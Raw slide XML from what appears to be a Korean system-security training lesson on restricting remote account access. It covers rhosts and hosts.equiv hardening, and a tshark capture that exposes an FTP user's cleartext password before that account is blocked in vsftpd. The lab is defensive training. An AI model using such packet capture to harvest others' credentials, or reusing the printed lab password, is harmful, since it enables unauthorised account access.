            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08117098-AC2E-4AF9-9B78-9B94DCD8EB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2" r="505" b="39473"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682069" y="1553846"/>
            <a:ext cx="4777613" cy="1568565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705017E2-13E1-4A43-9389-2A1938DE6AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1" r="-1694" b="38526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682069" y="3693635"/>
            <a:ext cx="4858531" cy="1580492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D9FDA7-4D1A-471D-A4F2-45FC2B0ED4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346853" y="1327531"/>
            <a:ext cx="4975733" cy="734187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C07CCF-A532-44CD-A607-091A7696E30F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346853" y="3020251"/>
            <a:ext cx="3863445" cy="3340535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588DF408-18FA-483E-A1D2-ECA8B34241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C13A0F82-CE7F-4DF3-9F01-0ED8953D80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F7D8D806-013D-4342-93BC-0E99670E3D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428D6FCE-7651-4D86-9AC4-BB32C24CD55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84222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6) /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 호스트 정보 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</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err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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0705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/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일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a:t>700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ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.equiv</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/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의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700 /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l /root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rhosts</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8E8F543-4B21-4BE2-A553-C48DB650CEC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131121466"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="515452"/>
          <a:ext cx="4932807" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="267394794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etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>hosts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.equiv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91365527"/>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 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548446"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E95D251-DD24-49C0-B60E-4994D7E7A136}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2408794911"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="633303" y="2867809"/>
          <a:ext cx="4932807" cy="1711706"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="51772631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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>rhost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596990713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="14538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파일과 유사하게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시스템에 전역적으로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(globally)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적용되지만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rhost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해당 계정 접근 시에만 적용된다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992199"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968E0337-4106-4EAC-BF96-386F65B18568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="632732" y="5380115"/>
            <a:ext cx="5019040" cy="670433"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8548DEE-1065-4E82-B67E-6CE038ADB89D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391728" y="1111454"/>
            <a:ext cx="4861560" cy="1089660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D747B25A-341F-4D83-BF42-F6B408465DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6391728" y="3216932"/>
            <a:ext cx="4602480" cy="1013460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FEDB8B-2514-4783-911F-090859734658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4522543"/>
            <a:ext cx="5616792" cy="1966456"/>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CB04A819-9527-40B3-A930-34332102371E}"/>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60F0EEF2-3CA1-4C1A-BB0D-29B474CF59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BE1A243-A4BA-4772-85F4-5ED2DA18A3C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6" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5423405C-4958-48C5-B98D-DE37797AED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520476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/Training/Unit/Sys/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>계정 원격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서비스에 접속하여 사용 중인 사용자를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설정을 통해 해당 계정의 접속을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캡처 및 저장 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패킷수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저장된 패킷 보기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사용자 목록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원격 접속을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97A45B3D-2CB8-453B-8D79-65C1065A79D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218C406-B480-452C-B3B9-2E255F46DA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9C9462-9415-46AA-A63D-09128298265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E90C56FA-1520-44BB-864E-6B7C29FF30D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9597967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200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>개의 패킷 캡처 및 저장</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저장된 패킷 검토</a:t>
            </a:r>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navy123 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비밀번호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>: qwer1031</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 접속했음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단 사용자 목록에 해당 계정 추가</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9"/>
            <a:ext cx="5616792" cy="505208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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>_list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   맨 마지막에 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart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다시 패킷을 캡처하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy123 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접근이 거부됨을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E184BD-4519-40CB-8627-41235BA5CE98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1034" t="80601" r="19333" b="2136"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570593" y="920963"/>
            <a:ext cx="4300093" cy="602107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65847C6A-0C4E-40C3-B79F-B635824B71D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2567818298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="570593" y="1658568"/>
          <a:ext cx="4932807" cy="980186"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="181491520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tshark </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옵션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90192671"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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-c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캡처할 패킷들의 수</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-w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캡처한 패킷들을 저장할 파일 이름</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 :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캡처된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패킷들이 저장된 파일 이름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779775"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B2D52D7-8B2A-431B-90DB-7A08F5C3228C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1334" t="13784" r="1234" b="4042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="570022" y="3277627"/>
            <a:ext cx="4841422" cy="2572498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EEEF75B-AA02-45F9-9FA8-FEEA8237509C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1" r="-294" b="14213"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281892" y="855949"/>
            <a:ext cx="5033807" cy="2247613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
